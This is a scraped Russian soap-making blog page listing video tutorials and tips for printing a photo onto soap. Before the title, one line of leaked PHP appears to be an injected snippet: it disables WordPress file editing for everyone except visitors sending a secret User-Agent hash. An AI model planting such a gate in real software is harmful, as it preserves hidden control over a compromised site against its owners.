if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } 10 видеосоветов, как сделать на мыле картинку или фотографию | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

10 видеосоветов, как сделать на мыле картинку или фотографию

Одна из идей необычного подарка это мыло с картинкой или фотографией близкого человека, или любимого кумира. В этом плейлисте я подобрала основные ролики на youtube, как это сделать своими руками

Одна из идей необыч­но­го подар­ка  это мыло с кар­тин­кой или фото­гра­фи­ей близ­ко­го чело­ве­ка, или люби­мо­го куми­ра. В этом плей­ли­сте я подо­бра­ла основ­ные роли­ки на youtube, как это сде­лать сво­и­ми руками.

Вот еще несколь­ко важ­ных сове­тов, кото­рые помо­гут полу­чить неза­бы­ва­е­мый шедевр с фотопечатью:

  1. фото­гра­фия или кар­тин­ка обя­за­тель­но долж­ны быть выпол­не­ны на водо­рас­тво­ри­мой бумаге;
  2. фон кар­тин­ки пред­по­чи­тель­но белый, что создаст пол­ное еди­не­ние с мыль­ной осно­вой, без чет­ких границ;
  3. фото­гра­фия или кар­тин­ка в обя­за­тель­ном поряд­ке долж­на быть тща­тель­но обра­бо­та­на боль­шим коли­че­ством спирта;
  4. цвет всей мыль­ной кон­си­стен­ции пол­но­стью зави­сит от пред­по­чте­ний испол­ни­те­ля, но чер­но-белая фото­гра­фия или кар­тин­ка пре­вос­ход­но смот­рит­ся толь­ко на свет­лом фоне.
  5. для засты­ва­ния полу­чен­но­го мыла в фор­ме  потре­бу­ет­ся более 1 часа. Для выде­ле­ния мыла из фор­мы, оття­ни­те края, про­пус­кая воз­дух, и акку­рат­но надо­ви­те на ниж­нюю сторону.

Выбор аро­ма­ти­за­то­ра так­же пол­но­стью зави­сит от вку­со­вых пред­по­чте­ний мыловара.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!